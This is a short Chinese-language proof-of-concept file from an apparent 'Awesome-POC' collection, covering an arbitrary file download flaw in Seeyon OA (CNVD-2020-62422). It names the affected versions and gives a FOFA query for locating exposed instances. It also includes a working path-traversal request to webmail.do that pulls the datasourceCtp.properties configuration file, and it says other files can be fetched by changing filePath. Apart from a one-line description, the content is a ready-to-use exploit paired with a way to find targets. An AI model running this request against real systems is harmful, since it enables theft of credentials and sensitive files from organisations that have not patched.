Awesome-POC/OA产品漏洞/致远OA webmail.do 任意文件下载 CNVD-2020-62422.md
2022-05-20 15:57:09 +08:00

33 lines
656 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 致远OA webmail.do 任意文件下载 CNVD-2020-62422
## 漏洞描述
致远OA存在任意文件下载漏洞攻击者可利用该漏洞下载任意文件获取敏感信息
## 漏洞影响
```
致远OA A6-V5
致远OA A8-V5
致远OA G6
```
## FOFA
```
app="致远互联-OA"
```
## 漏洞复现
验证POC
```
/seeyon/webmail.do?method=doDownloadAtt&filename=test.txt&filePath=../conf/datasourceCtp.properties
```
在漏洞的OA 系统将会下载 `datasourceCtp.properties` 配置文件
![image-20220520153850024](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201538060.png)
更改参数 filePath 可下载其他文件